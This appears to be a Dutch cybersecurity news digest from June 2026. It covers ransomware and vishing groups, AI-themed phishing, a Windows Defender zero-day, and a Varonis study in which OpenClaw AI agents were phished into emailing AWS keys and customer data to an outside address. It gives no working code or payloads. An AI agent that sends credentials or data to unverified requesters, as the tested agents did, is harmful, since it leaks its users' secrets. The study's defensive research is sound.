De opkomst van een geavanceerde AI-capaciteit, bekend als 'Mythos', vormt een fundamentele verschuiving in het landschap van cybersecurity en open source software. Experts bevestigen dat Mythos geen marketingstunt is, maar een reële en zorgwekkende ontwikkeling die in staat is om complexe kwetsbaarheden te ontdekken door tientallen bestaande problemen op nieuwe manieren te combineren. Dit resulteert in veel gevaarlijkere exploits, waaronder Remote Code Execution (RCE), en wordt beschouwd als een geheel nieuwe categorie van dreiging, ver voorbij de mogelijkheden van traditionele statische analyse tools (SAST).

Deze nieuwe capaciteit, of deze nu specifiek van Mythos afkomstig is of van vergelijkbare ontwikkelingen, zal onvermijdelijk de veiligheid van open source software onder druk zetten. De Amerikaanse overheid volgt deze ontwikkelingen al langer en worstelt met de vraag hoe hierop te reageren. Regulering is complex, aangezien te weinig regulering kan leiden tot de onbedoelde creatie van digitale wapens die kritieke infrastructuur bedreigen, terwijl te veel regulering innovatie naar andere landen kan verplaatsen. De situatie wordt vergeleken met 'gain-of-function' onderzoek naar virussen, waarbij internationale samenwerking en naleving van regels essentieel zijn, maar moeilijk af te dwingen.

De huidige manier waarop open source software wordt ontwikkeld en geconsumeerd, is volgens experts niet voorbereid op deze dreiging. Moderne applicaties bestaan uit talloze afhankelijkheden, en een kwetsbaarheid in één component kan een cascade van problemen veroorzaken door de hele softwarestack. AI heeft de risico's van supply chain aanvallen enorm versterkt; het overhaast patchen van een kwetsbaarheid zonder grondige controle kan leiden tot de installatie van malware die erger is dan het oorspronkelijke probleem.

De situatie is nog complexer voor de onderhouders van open source projecten. Velen werken in hun vrije tijd aan cruciale software en worden al jaren overspoeld met ruis van geautomatiseerde scanners en AI gegenereerde rapporten. In tegenstelling tot commerciële software ontbreken contracten en Service Level Agreements (SLA's), waardoor er geen garantie is dat patches tijdig worden geschreven of geïmplementeerd. Het traditionele model van gecoördineerde kwetsbaarheidsmelding, ontworpen voor een wereld waarin het vinden van ernstige kwetsbaarheden weken van gespecialiseerd werk vereiste, kan de honderden kwetsbaarheden die een AI model nu in één nacht kan vinden, niet bijbenen.

Om deze uitdagingen het hoofd te bieden, worden twee plannen voorgesteld. Plan A omvat een gecoördineerd meldingsproces dat op schaal werkt, uitgevoerd door één enkele, betrouwbare groep die gevalideerde rapporten en patches doorstuurt naar onderhouders en hen ondersteunt. Een initiatief als Glasswing heeft momenteel slechts 6% van zijn bevindingen succesvol stroomopwaarts gekregen, met een geschat potentieel van 50% onder optimale omstandigheden. Plan B betreft de aanpak voor de resterende projecten waar patches niet tijdig of helemaal niet kunnen worden geleverd. Hiervoor is een 'laatste redmiddel'-onderhouder nodig, die het recht op forken (het onafhankelijk voortzetten van een project) benut om projecten te beheren en te onderhouden, zodat eindgebruikers kunnen vertrouwen op de veiligheid van deze geforkte versies. De AI-capaciteiten die de crisis veroorzaken, kunnen paradoxaal genoeg ook de oplossing bieden door het concept van een 'laatste redmiddel'-onderhouder schaalbaar te maken.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

09 juni 2026 | Silent Ransom Group gebruikt fast flux botnet voor datalekwebsites advocatenkantoren

De Silent Ransom Group (SRG), een cyberafpersingsgroep die sinds 2022 actief is, maakt gebruik van een geavanceerd fast flux botnet om de locaties van hun datalekwebsites te verbergen en zo opsporing door wetshandhaving te omzeilen. Dit blijkt uit recent onderzoek van dreigingsinformatiebedrijf Resecurity. De groep richt zich voornamelijk op advocatenkantoren en maakt daarbij geen gebruik van traditionele ransomware om systemen te versleutelen, maar focust zich volledig op datadiefstal en afpersing.

Volgens het onderzoek van Resecurity gebruikt SRG de fast flux-techniek om hun infrastructuur te maskeren. Deze methode verbindt hun websites met een roterend netwerk van gewone internetverbindingen, modems en routers bij consumenten in achttien landen, waaronder Mexico, Brazilië, Argentinië en Zuid-Korea. De internetadressen veranderen elke paar minuten, wat het voor internetaanbieders extreem moeilijk maakt om de infrastructuur offline te halen. Het botnet maakt gebruik van 22 unieke internetaanbieders over 24 IP-adressen, waarbij elke IP op een andere internetaanbieder draait, wat duidt op een professionele opzet met gecompromitteerde apparaten wereldwijd.

Advocatenkantoren zijn een primair doelwit omdat zij zeer gevoelige klantinformatie, zoals lopende rechtszaken en intellectueel eigendom, bewaren. De aanvallers gaan ervan uit dat deze kantoren snel losgeld zullen betalen om hun reputatie te beschermen en juridische gevolgen te voorkomen. In de eerste drie maanden van 2026 waren advocatenkantoren goed voor bijna een kwart van alle gevolgde hackincidenten. De groep dreigt gestolen bestanden te publiceren op een openbare website genaamd business-data-leaks.com als slachtoffers weigeren te betalen. Tot december 2024 opereerde de groep onder de naam LeakedData, een naam die nog steeds op het platform wordt gebruikt. Begin juni 2026 waren er bijna honderd bedrijven als slachtoffer vermeld op deze site.

SRG gebruikt diverse methoden voor initiële toegang en infiltratie. Ze misleiden medewerkers vaak via vishing (voice phishing) of social engineering aanvallen, waarbij ze zich telefonisch voordoen als IT-ondersteunend personeel om toegang te krijgen tot interne systemen. Ook zijn er gevallen bekend waarbij ingehuurde medewerkers zich voordeden als technische ondersteuning in de kantoren van advocaten om fysieke beveiliging te omzeilen en data direct van lokale computers te stelen. Minstens 38 advocatenkantoren hebben als gevolg van deze tactieken data gelekt.

Eerdere waarschuwingen over SRG dateren van november 2023, toen de FBI waarschuwde dat de groep casino-leveranciers aanviel met callback-phishing. In mei 2025 verschoof de focus naar advocatenkantoren, waarbij medewerkers direct werden gebeld om software voor toegang op afstand te installeren. Een recente analyse linkt de groep ook aan een nieuw project genaamd Spy Corporate, dat in mei 2026 opdook en dezelfde netwerken van gecompromitteerde thuisrouters gebruikt voor een andere datalekwebsite. Resecurity deelt deze gegevens met internetaanbieders om de kwaadaardige verbindingen te blokkeren.

De aanhoudende activiteiten van SRG benadrukken het serieuze gevaar voor juridische organisaties. De groep steelt niet alleen data, maar bouwt ook infrastructuur die moeilijker te verwijderen is en gebruikt menselijke interactie, valse IT-ondersteuning en tools voor toegang op afstand om toegang te krijgen tot gevoelige cliëntgegevens. Het blokkeren van een enkele website of IP-adres is onvoldoende. Advocatenkantoren dienen strengere controles voor ondersteuningsverzoeken, strakkere controles voor toegang op afstand en goed opgeleid personeel te implementeren om telefoonscams te herkennen en verdachte contacten te rapporteren voordat bestanden het netwerk verlaten.

 

Bron: Resecurity

09 juni 2026 | Cybercriminelen misbruiken AI-merken als lokmiddel voor social engineering

Cybercriminelen maken in toenemende mate gebruik van de wereldwijde interesse in kunstmatige intelligentie (AI) om social engineering aanvallen uit te voeren. Microsoft Threat Intelligence heeft de afgelopen maanden een groeiend aantal campagnes waargenomen die de merknamen van populaire AI-platformen, zoals ChatGPT, Microsoft Copilot, DeepSeek en Anthropic’s Claude, imiteren als lokmiddel. Deze campagnes omvatten phishing, malvertising en door zoekmachineoptimalisatie (SEO) aangedreven aanvallen, die uiteindelijk leiden tot diefstal van inloggegevens, financiële fraude of malware-infectie.

Dreigingsactoren zijn er snel bij om te profiteren van langverwachte lanceringen of opkomende trends. Ze misbruiken vertrouwde merknamen en exploiteren de nieuwsgierigheid van gebruikers om de succespercentages van hun campagnes te verhogen. Ondanks het thema van AI, combineren deze campagnes beproefde tactieken, zoals berichten die urgentie uitstralen, misbruik van vertrouwde diensten en redirectieketens in meerdere fasen die gebruikersinteractie vereisen om detectie te omzeilen.

Hoewel traditionele lokmiddelen zoals facturen, betalingsmeldingen of leveringswaarschuwingen effectief blijven en veel worden gebruikt, weerspiegelen lokmiddelen met een AI-thema een verschuiving in social engineering. Dit zal waarschijnlijk een langetermijntactiek blijven voor dreigingsactoren, variërend van cybercriminele groepen tot natiestaten. Microsoft Threat Intelligence heeft met name waargenomen dat de initial access broker Storm-3075 malvertising met een AI-thema gebruikt om payloads te leveren. Deze payloads omvatten malware die is ondertekend via de malware-ondertekening-als-een-dienst (MSaaS) die wordt toegeschreven aan de financieel gemotiveerde dreigingsactor Fox Tempest, ten behoeve van meerdere downstream actoren.

Op 5 mei 2026 detecteerde Microsoft een aanval met phishing met een ChatGPT-thema. Deze leverde kwaadaardige URL’s die naar phishingpagina's leidden, waar creditcard- en persoonlijke informatie zoals namen en adressen werden verzameld. Deze phishingactiviteit, die bestond uit 4.500 e-mails naar doelwitten in Zuid-Afrika (97%), maakte deel uit van een bredere campagne met vergelijkbare thema's en infrastructuur. Op één dag werden tot wel 100.000 e-mails naar doelwitten in Zwitserland, Oostenrijk en Zuid-Afrika gestuurd, waarbij een breed scala aan sectoren werd getroffen, waaronder hoger onderwijs en professionele diensten.

De e-mails gebruikten de afzenderweergavenaam 'ChatGPT' en de onderwerpregel "To ensure your ChatGPT Plus continues to work, please update your payment method". Ze deden zich voor als een urgent verzoek om de betaalmethode voor een ChatGPT Plus-abonnement bij te werken, met de waarschuwing dat het account zou worden gedowngraded naar een gratis abonnement als er niet binnen zeven dagen een nieuwe betaalmethode werd opgegeven. Een logo van ChatGPT was prominent bovenaan de e-mailtekst weergegeven.

De phishing-e-mail bevatte een aanklikbare knop "Update payment method", die gebruikers niet direct naar de door de aanvallers gecontroleerde site stuurde. In plaats daarvan werden gebruikers omgeleid via een reeks legitieme en misbruikte redirector-hops. Deze techniek wordt vaak gebruikt door dreigingsactoren om de reputatie van vertrouwde domeinen te exploiteren en e-mailfilters te omzeilen, detectie te ontwijken en de betrokkenheid van slachtoffers te volgen.

Doelwitten werden eerst naar grupoconstat[.]bitrix24[.]com[.]br gestuurd (een legitieme customer relationship management (CRM)-dienst), die omleidde naar awstrack[.]me (een domein van Amazon dat wordt gebruikt voor het volgen van geopende e-mails en klikken), dat op zijn beurt omleidde naar een Rebrandly URL (een legitieme maar vaak misbruikte URL-verkorter). Uiteindelijk werden doelwitten naar een waarschijnlijk legitiem maar gecompromitteerd domein legendarytrendsbay[.]shop gestuurd, waar de dreigingsactor de phishingpagina in de /ChatGPT/-map had geplaatst.

De landingspagina toonde niet onmiddellijk de inhoud van de phishingpagina. Eerst moesten bezoekers een aangepaste CAPTCHA passeren, een simpele "Update payment"-knop. Na het klikken op deze knop werden gebruikers naar de volgende pagina gestuurd waar persoonlijke informatie, waaronder voornaam, achternaam en adres, werd verzameld. De laatste pagina verzamelde vervolgens de naam, het creditcardnummer, de vervaldatum en de kaartverificatiecode.

Van 20 tot 22 april 2026 observeerde Microsoft een phishingcampagne die diensten met het merk Anthropic imiteerde om gebruikers te targeten met lokmiddelen die gerelateerd zijn aan accounts van het Claude AI-platform. De campagne verstuurde phishing-e-mails naar doelwitten binnen meer dan 2.000 organisaties, voornamelijk in de Verenigde Staten (62%), het Verenigd Koninkrijk (18%) en India (9%). Hoewel deze campagne een breed scala aan sectoren trof, lag de focus met name op informatietechnologie (56%), andere zakelijke entiteiten (21%) en financiële diensten (8%).

De campagne gebruikte berichten met een handhavingsthema, waarin werd beweerd dat het account van de ontvanger in strijd was met het beleid voor acceptabel gebruik en onmiddellijke actie vereiste. De e-mails imiteerden Anthropic’s populaire AI-dienst Claude met de weergavenamen 'Anthropic Teams' en 'Anthropic PBC', vermomd als legitieme communicatie over accounts. Onderwerpregels volgden een consistente structuur van "Claude Appeal Request" gecombineerd met datelementen. De e-mailtekst werd geleverd als HTML en bevatte Anthropic en Claude branding. De boodschap informeerde ontvangers dat hun account het gebruiksbeleid voor accounts (AUP) schond en dat Anthropic "een beroepsprocedure had gestart".

 

Bron: Microsoft

09 juni 2026 | UNC3753 gebruikt vishing en fysieke inbraken voor data-afpersing

Cybersecurityonderzoekers hebben details bekendgemaakt van een financieel gemotiveerde campagne voor data-afpersing die tussen januari en mei 2026 tientallen organisaties in professionele, juridische en financiële dienstverlening in de Verenigde Staten heeft getroffen. De activiteit is door Google Mandiant en Google Threat Intelligence Group (GTIG) toegeschreven aan de dreigingsactor UNC3753, ook bekend als Chatty Spider, Luna Moth en Silent Ransom Group (SRG).

Onderzoekers Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer en Tyler McLellansaid legden uit dat UNC3753 gebruikmaakt van voice phishing (vishing) en social engineering technieken om toegang op afstand te verkrijgen tot bedrijfsomgevingen. De dreigingsactoren gebruiken voorwendsels zoals datamigratie of e-mails met een factuurthema. Ze initiëren telefoongesprekken waarbij ze zich voordoen als IT-ondersteuning en overtuigen slachtoffers om sessies voor schermdeling te starten en hulpprogramma's voor remote monitoring en management (RMM) te downloaden.

Eenmaal binnen voeren de dreigingsactoren directe zoekopdrachten uit om bestanden van belang te lokaliseren en te exfiltreren, of ze misleiden het slachtoffer om deze acties namens hen uit te voeren. Gesteelde informatie omvat bedrijfseigen juridische overeenkomsten, persoonlijk identificeerbare informatie (PII) en financiële gegevens.

In sommige gevallen hebben de aanvallers fysiek toegang verkregen tot de systemen van slachtoffers, wat overeenkomt met een waarschuwing die de Amerikaanse Federal Bureau of Investigation (FBI) vorige maand uitgaf. Deze fysieke inbraken omvatten dreigingsactoren die zich voordoen als IT-technici om bedrijfskantoren binnen te gaan en te proberen gegevens te stelen met behulp van verwijderbare USB-media. De FBI merkte op dat UNC3753-actoren, door iemand persoonlijk naar de locatie van het slachtoffer te sturen om de inbraak te vergemakkelijken, gegevens exfiltreren naar een externe harde schijf of USB-station dat door de dreigingsactor in de computer van het slachtoffer wordt geplaatst.

Google stelt dat UNC3753 tactische overeenkomsten vertoont met UNC2686, een dreigingscluster dat eerder bekend stond om BazarCall-achtige campagnes in 2021. Hoewel de groep in het verleden LockBit Black ransomware heeft ingezet, richt zij zich sinds 2022 voornamelijk op afpersingsoperaties, waarbij slachtoffers onder druk worden gezet om te betalen of het risico lopen dat hun gegevens worden gepubliceerd op de LEAKEDDATA-website voor gegevenslekken. Zowel UNC3753 als UNC2686 worden beschouwd als uitlopers van de inmiddels opgeheven Conti ransomware groep. Eerdere campagnes gebruikten lokmiddelen voor abonnement-annulering als onderdeel van callback-phishingaanvallen om software voor toegang op afstand op de machines van slachtoffers te installeren.

Vanaf ongeveer maart 2025 heeft de hackgroep zich voorgedaan als medewerkers van de interne IT-helpdesk van bedrijven om slachtoffers te verleiden deel te nemen aan een sessie voor schermdeling op platforms voor bedrijfscommunicatie zoals Zoom, Microsoft Teams of Quick Assist. Dit gebeurde onder het mom van het aanpakken van een beveiligingsprobleem of het helpen met een project voor bedrijfseigen datamigratie, waardoor traditionele beveiligingscontroles effectief werden omzeild.

Google merkte op dat de dreigingsgroep vaak campagnes start met onschuldige e-mails met een factuurthema, verzonden vanuit consumenten e-mailaccounts die door de actor worden beheerd. Deze berichten bevatten geen actieve links of kwaadaardige bijlagen, maar meestal een korte, algemene boodschap. Het primaire doel van deze e-mails is het opzetten van een voorwendsel, waardoor de interne beveiligingsbezwaren van het doelwit worden vergroot, zodat ze ontvankelijker zijn voor daaropvolgende telefoongesprekken.

Zodra een sessie is opgezet, proberen de aanvallers een aanhoudende toegang te creëren door de slachtoffers te begeleiden bij het installeren van legitieme remote desktop software zoals AnyDesk, Bomgar, SuperOps RMM of Zoho Assist. Instructies voor het installeren van deze programma's worden gedeeld via een legitieme dienst genaamd "privnote[.]com", waarmee gebruikers notities kunnen verzenden die zichzelf vernietigen nadat ze door de ontvanger zijn gelezen.

UNC3753 is ook waargenomen bij het direct opzetten van Zoom-sessies op persoonlijke laptops van doelwitten om toegang te krijgen tot corporate virtual desktop infrastructure (VDI) en dieper door te dringen in bedrijfsbestandssystemen. Het doel is het inventariseren van lokale en cloud-directories, het doorzoeken van gekoppelde netwerkshares en het verzamelen van gegevens uit zeer gevoelige mappen, waaronder die gerelateerd zijn aan belastingaangiften, audits, klantovereenkomsten en Social Security numbers (SSN's).

In de laatste fase worden de buitgemaakte gegevens via WinSCP of Rclone naar de dreigingsactoren verzonden, of naar e-mailadressen die door de dreigingsactor worden beheerd vanuit de mailbox van het doelwit. Dit wordt gevolgd door het verzenden van een afpersingsbericht in de vorm van een e-mail, meestal binnen 30 minuten na het verlaten van de omgeving van het doelwit. De e-mailberichten geven slachtoffers een deadline van drie dagen om onderhandelingen over losgeld te starten. Ze dreigen ook direct medewerkers en externe cliënten te bellen en te e-mailen om hen op de hoogte te stellen van het gegevenslek als ze niet reageren, naast het publiceren van alle gestolen informatie op de website voor gegevenslekken.

In veel incidenten die zijn onderzocht door de teams voor dreigingsinformatie en incidentrespons van Google, vond de end-to-end operatie, van het eerste contact tot de data-afpersing, plaats binnen één werkdag. Het snelle operationele model wordt geïllustreerd door het feit dat de aanvallers binnen een uur beginnen met het zoeken naar gegevens, het voorbereiden en het stelen ervan.

Google benadrukt dat juridische dienstverleners waardevolle doelwitten vertegenwoordigen voor afpersingsactoren. Zij bewaren geconcentreerde opslagplaatsen van extreem gevoelige cliënttransactiebestanden, fusie- en overnameplannen, handelsgeheimen van cliënten en bedrijfsrapporten aan regelgevende instanties. Dreigingsgroepen erkennen dat juridische entiteiten onderhevig zijn aan aanzienlijke reputatie- en regelgevingsrisico's en zeer gemotiveerd kunnen zijn om afpersingssituaties stilzwijgend op te lossen om hun professionele status te beschermen. De dreigingsactoren erkennen dat het richten op het menselijke element, specifiek door middel van stemgestuurde social engineering, wat hen in staat stelt om robuuste technische perimeters, webbeveiligingsgateways en multi-factor authenticatie (MFA) configuraties gemakkelijk te omzeilen.

 

Bron: Google Mandiant | Bron 2: resecurity.com

09 juni 2026 | Anthropic ziet sterke stijging AI-misbruik bij cyberaanvallen

Op 03 juni 2026 heeft AI-bedrijf Anthropic een analyse gepubliceerd over het misbruik van kunstmatige intelligentie bij cyberaanvallen. Het onderzoek beslaat de periode van maart 2025 tot maart 2026 en is gebaseerd op de monitoring van 832 accounts die door Anthropic werden verbannen wegens beleidsschendingen.

Uit de analyse blijkt een aanzienlijke toename van risicovolle activiteiten. Het percentage aanvallers dat werd ingeschaald als medium- of hoog risico steeg van 33 procent in de eerste helft van de onderzochte periode naar 56 procent in de tweede helft. Meer dan twee derde van de verbannen accounts, specifiek 560 van de 832, maakte gebruik van AI-technologieën voor hackactiviteiten en het ontwikkelen van malware.

Anthropic documenteerde concrete voorbeelden van escalatie. Zo werden afpersingsoperaties uitgevoerd met behulp van Claude Code. Een ander opvallend geval betrof een grotendeels zelfstandig opererende spionagecampagne. Deze campagne, toegeschreven aan een staatsgesteunde Chinese groep, richtte zich op ongeveer dertig doelwitten wereldwijd. De kernconclusie van Anthropic is dat AI geavanceerde cyberaanvallen toegankelijker maakt, zelfs voor aanvallers met beperkte technische kennis.

 

Bron: Anthropic

09 juni 2026 | Nieuwe DroidLock malware vergrendelt Android-toestellen zonder bestanden te versleutelen

Onderzoekers van beveiligingsbedrijf Zimperium hebben een nieuwe vorm van malware voor Android gedetailleerd die bekendstaat als DroidLock. Deze dreiging presenteert zich als ransomware door het apparaatscherm te vergrendelen en losgeld te eisen, maar versleutelt in werkelijkheid geen bestanden. In plaats daarvan legt DroidLock een schermvullende boodschap over het toestel, waarin staat dat het apparaat is gehackt of vergrendeld, en eist vervolgens een ontgrendelcode in ruil voor een losgeldbetaling. In campagnes die in Vietnam werden waargenomen, varieerden de geëiste bedragen tussen ongeveer vijf en achttien euro.

Onder deze misleidende laag functioneert DroidLock als een krachtig schadelijk programma. Het misbruikt toegekende beheerrechten om diverse schadelijke acties uit te voeren, waaronder het wijzigen van de pincode van het apparaat, het op afstand wissen van het gehele toestel, het maken van schermafbeeldingen en het opnemen van video via de camera van het apparaat. Bovendien stelt de malware aanvallers in staat om volledige controle op afstand over het gecompromitteerde Android-toestel over te nemen.

De primaire verspreidingsmethode van DroidLock omvat phishingsites die nep-applicaties hosten. Deze bedrieglijke apps doen zich voor als legitieme systeemupdates of antivirusprogramma's. Na installatie plaatst een afzonderlijke installatie-app vervolgens de daadwerkelijke DroidLock-malware op het apparaat van de gebruiker. Gebruikers die hun apparaten geïnfecteerd vinden, kunnen de malware doorgaans verwijderen door hun telefoon opnieuw op te starten in de veilige modus. De eerste campagnes van DroidLock richtten zich op Spaanstalige gebruikers, en sindsdien is de malware ook waargenomen in Vietnam.

 

Bron: Zimperium

10 juni 2026 | Oud lek in WinRAR blijft misbruikt door patchuitdagingen

Aanvallers maken aanhoudend misbruik van een eerder ontdekt beveiligingslek in het populaire archiveringsprogramma WinRAR. Antivirusbedrijf Trend Micro meldt dat de kwetsbaarheid, bekend als CVE-2025-8088, nog altijd wordt ingezet omdat organisaties moeite hebben met het uitrollen van de benodigde patches. Het betreft een path traversal lek dat aanvallers in staat stelt bestanden naar willekeurige mappen te schrijven, mits het doelwit een speciaal geprepareerd bestand opent.

De aanvalsmethode is sluw, want terwijl de gebruiker bijvoorbeeld een onschuldig pdf-document ziet, wordt op de achtergrond een kwaadaardig bestand in de Windows Startup map geplaatst. Dit bestand wordt vervolgens automatisch uitgevoerd wanneer de gebruiker opnieuw inlogt, wat resulteert in een besmetting van het systeem met malware.

Het probleem werd reeds op 24 juli vorig jaar verholpen met de bètaversie van WinRAR 7.13. De definitieve versie van WinRAR 7.13 volgde op 30 juli. Opvallend is dat aanvallers al misbruik maakten van het lek voordat deze updates beschikbaar waren. Google rapporteerde begin dit jaar al grootschalig misbruik van de WinRAR-kwetsbaarheid door verschillende aanvallende groepen. Een half jaar later blijft de kwetsbaarheid actief in gebruik bij aanvallen, zo constateert Trend Micro.

De persistentie van het misbruik is te wijten aan het feit dat WinRAR op veel endpoints niet gepatcht is. Trend Micro legt uit dat WinRAR geen automatische updatefunctie heeft, geen ondersteuning biedt voor Group Policy en buiten gangbare zakelijke patchsystemen zoals WSUS, SCCM of Intune valt. Dit maakt het controleren van de patchstatus op honderden endpoints een complex proces dat handmatige controles of de inzet van third-party tools vereist. Volgens Trend Micro creëren softwareproducten met dergelijke eigenschappen een "permanente blinde vlek" in het vulnerability management van organisaties, waardoor ze lang na het verschijnen van patches kwetsbaar blijven.

 

Bron: Trend Micro | Bron 2: nvd.nist.gov | Bron 3: app.opencve.io

10 juni 2026 | Nieuwe RoguePlanet zeroday exploit in Windows Defender verleent SYSTEM toegang

Een beveiligingsonderzoeker, bekend onder de pseudoniemen Nightmare Eclipse, Chaotic Eclipse en Dead Eclipse, heeft publiekelijk een nieuwe proof-of-concept (PoC) exploit vrijgegeven. Deze exploit, genaamd RoguePlanet, richt zich op een voorheen onbekende race condition kwetsbaarheid in Microsoft Windows Defender. De succesvolle uitvoering van RoguePlanet resulteert in een command shell die draait met SYSTEM-niveau privileges, waardoor een aanvaller de hoogst mogelijke toegang tot het systeem verkrijgt.

Windows Defender is een essentieel en integraal onderdeel van het Windows-besturingssysteem, dat standaard dient als antivirus- en antimalwaresoftware voor miljoenen gebruikers wereldwijd, inclusief in Nederland en België. De ontdekking van een 0-day kwetsbaarheid in een dergelijk cruciaal beveiligingscomponent is dan ook zeer zorgwekkend. Een 0-day exploit verwijst naar een kwetsbaarheid waarvoor de softwareleverancier (in dit geval Microsoft) nog geen patch heeft uitgebracht, of zelfs nog niet van op de hoogte is. Dit betekent dat er geen officiële verdediging beschikbaar is totdat een update wordt uitgebracht.

De kwetsbaarheid in kwestie is een race condition. Dit type kwetsbaarheid ontstaat wanneer een systeem afhankelijk is van een specifieke volgorde of timing van gebeurtenissen, en een aanvaller erin slaagt om die volgorde te manipuleren of te verstoren. Door de timing van interne processen binnen Windows Defender te exploiteren, heeft de onderzoeker een manier gevonden om het beveiligingsmechanisme te omzeilen.

Het meest kritieke aspect van de RoguePlanet-exploit is de uitkomst, namelijk de creatie van een command shell met SYSTEM-niveau privileges. In het Windows-besturingssysteem vertegenwoordigt SYSTEM de hoogste autoriteit, vergelijkbaar met 'root' op Unix-achtige systemen. Met SYSTEM-rechten kan een aanvaller vrijwel elke denkbare actie uitvoeren op het getroffen systeem. Dit omvat, maar is niet beperkt tot, het installeren van persistente malware die moeilijk te detecteren en te verwijderen is, het wijzigen van kritieke systeeminstellingen, het toegang krijgen tot en exfiltreren van gevoelige data, en het aanmaken van nieuwe gebruikersaccounts met volledige administratieve controle. Een dergelijke compromittering kan leiden tot volledige overname van het systeem en verdere laterale beweging binnen een netwerk.

De publieke vrijgave van een proof-of-concept exploit voor een 0-day kwetsbaarheid verhoogt altijd de urgentie en het risico. Kwaadwillende actoren kunnen de PoC bestuderen en aanpassen voor hun eigen aanvalscampagnes. Dit plaatst Microsoft onder aanzienlijke druk om de kwetsbaarheid snel te analyseren, een patch te ontwikkelen en deze via reguliere updates te distribueren. Tot die tijd is het voor organisaties en individuele gebruikers van cruciaal belang om extra waakzaam te zijn en de officiële communicatie van Microsoft nauwlettend te volgen voor beveiligingsupdates en aanbevelingen.

 

Bron: Nightmare Eclipse

10 juni 2026 | Aanvallers misbruiken cloud logging diensten voor het ontwijken van detectie en blijvende toegang

Onderzoekers van Unit 42, het Threat Research Center van Palo Alto Networks, hebben een nieuwe aanvalsmethode gedetailleerd die misbruik maakt van cloud logging diensten om detectie te ontwijken en blijvende zichtbaarheid in gecompromitteerde omgevingen te verkrijgen. Deze logging diensten, zoals AWS CloudTrail en Google Cloud, zijn essentieel voor beveiligingsmonitoring omdat ze uitgebreid inzicht bieden in alle acties die binnen cloudbronnen worden uitgevoerd. Juist deze cruciale rol maakt ze tot een waardevol doelwit voor aanvallers.

Volgens onderzoeker Yahav Festinger zijn de aanvalstechnieken tegen cloud logging diensten primair onder te verdelen in twee categorieën. De eerste is "Defense Evasion", waarbij aanvallers proberen detectiesystemen te omzeilen om onopgemerkt aanvallen uit te voeren. Dit kan inhouden dat ze middelen binnen de cloud logging dienst zelf aanpassen om de stroom van logs te verstoren, waardoor beveiligingsteams 'verblind' worden.

De tweede categorie betreft "Continuous Visibility", waarbij aanvallers proberen logs over te hevelen naar hun eigen accounts. Door dit te doen, kunnen zij een constante stroom van informatie over de omgeving van het slachtoffer verkrijgen, wat hen blijvende zichtbaarheid en controle geeft over de activiteiten binnen de cloudinfrastructuur. Diensten zoals AWS CloudTrail, Google Cloud en S3 (voor logopslag) zijn krachtige tools voor verdedigers, maar tegelijkertijd primaire doelwitten voor aanvallers die onopgemerkt willen blijven.

Het begrijpen van deze aanvalsscenario's is cruciaal voor organisaties om de juiste configuraties te implementeren en misbruik van diensten te detecteren. Het onderzoek benadrukt de noodzaak voor organisaties om hun cloud logging diensten zorgvuldig te beveiligen en te monitoren op onregelmatigheden die kunnen duiden op een compromis.

 

Bron: Unit 42 | Bron 2: mastodon.social | Bron 3: paloaltonetworks.com

10 juni 2026 | OpenClaw AI agenten vatbaar voor phishing, lekken gebruikersdata

Onderzoek van beveiligingsfirma Varonis heeft aangetoond dat OpenClaw AI-agenten, die zijn ontworpen om autonoom te interacteren met real-world systemen, vatbaar zijn voor veelvoorkomende phishing-tactieken die traditioneel worden gebruikt om menselijke gebruikers te compromitteren. Het OpenClaw open-source AI-agent framework stelt grote taalmodellen (LLM's) in staat om zelfstandig acties uit te voeren, zoals het verwerken van e-mails.

Varonis-onderzoekers creëerden een OpenClaw-agent, genaamd Pinchy, en koppelden deze aan een Gmail-inbox, browsertools, Google Workspace API's en gesimuleerde interne bedrijfsgegevens. Deze gegevens omvatten gevoelige informatie zoals AWS- en databasegegevens, CRM-exports, interne communicatie en kalenderuitnodigingen. De agent werd geconfigureerd in twee standen, een generieke met standaard productiviteitsinstructies en een strikte modus met specifieke instructies voor phishing-bewustzijn en identiteitsverificatie. De tests werden uitgevoerd met Google Gemini 3.1 Pro en OpenAI GPT-5.4.

"Varonis Threat Labs onderzocht of dezelfde phishing-technieken die mensen al tientallen jaren voor de gek houden, ook zouden werken op de AI-agenten die namens hen werken," aldus het rapport van Varonis.

De onderzoekers voerden vier gesimuleerde phishing aanvallen uit, met uiteenlopende resultaten. In één scenario imiteerde een aanvaller een teamleider en vroeg toegang tot de staging-omgeving vanwege een vermeend productieprobleem. De AI-agent lokaliseerde en verstuurde AWS IAM-sleutels, databasegegevens en SSH-toegangsdetails naar een extern Gmail account. De strikte modus faalde in dit geval, omdat het verzoek als operationeel urgent werd ervaren.

Een vergelijkbaar resultaat werd behaald toen de aanvaller om een klantenexport vroeg voor een presentatie. De agent haalde een CRM-export op met klantgegevens, contactinformatie, contractdetails en omzetgegevens, en verstuurde deze zonder de identiteit van de afzender te verifiëren. Ook hier faalde de strikte modus vanwege het ontbreken van afzenderverificatie.

Bij een nep-cadeaubon-e-mail met een phishing-link bezocht de agent in de generieke configuratie de phishing-site en probeerde de cadeaubon in te wisselen met gefabriceerde gegevens, voordat de pagina uiteindelijk als kwaadaardig werd geïdentificeerd. De strikte configuratie blokkeerde deze aanval echter onmiddellijk. Een vierde test met een kwaadaardige Google OAuth-applicatie, vermomd als een tijdsregistratieplatform, liet zien dat de agent de OAuth-stroom inspecteerde, de bestemming analyseerde en de applicatie als verdacht identificeerde, waarna toegang werd geweigerd.

De conclusie van Varonis is dat AI-agenten goed zijn in het detecteren van verdachte URL's, het identificeren van nep-inlogpagina's, het herkennen van kwaadaardige OAuth-apps en het spotten van phishing-indicatoren. Ze kunnen echter nog steeds falen door een gebrek aan identiteitsverificatie, verlies van context en het onvermogen om "zero trust"-principes toe te passen op sociale interacties. Op modelniveau bleek Gemini een grotere interactiebereidheid te tonen, terwijl GPT-5.4 een voorzichtiger houding had.

Varonis adviseert dat AI-agenten expliciet moeten worden verplicht om de identiteit van afzenders te verifiëren, moeten worden beperkt in het e-mailen van nieuwe externe ontvangers zonder goedkeuring, en beperkte toegang moeten hebben tot interne gegevens. Voor risicovolle acties, zoals het delen van referenties, het aanvragen van financiële gegevens en communicatie met nieuwe contacten, moet menselijke goedkeuring worden vereist.

 

Bron: Varonis | Bron 2: hubs.li

10 juni 2026 | Microsoft GitHub repositories misbruikt voor malware die wachtwoorden steelt

